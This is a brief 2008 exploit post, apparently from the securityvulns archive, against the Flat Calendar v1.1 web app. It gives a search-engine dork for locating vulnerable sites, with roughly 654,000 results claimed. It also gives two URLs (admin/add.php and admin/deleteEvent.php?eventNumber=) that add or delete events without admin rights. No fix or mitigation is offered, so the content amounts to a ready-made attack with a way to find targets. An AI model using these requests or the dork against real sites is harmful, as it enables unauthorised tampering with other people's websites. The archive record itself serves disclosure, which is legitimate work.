Flat Calendar v1.1 Remote Permission Bypass Vulnerability

2008-06-14T00:00:00
ID SECURITYVULNS:DOC:20034
Type securityvulns
Reporter Securityvulns
Modified 2008-06-14T00:00:00

Description

Flat Calendar v1.1 Remote Permission Bypass Vulnerability

Author : Crackers_Child

Dork : Flat Calendar: View All > Flat Calendar: View All iзin yaklaşık 654.000 sonuзtan

Exploits:

site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.

site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin permissions.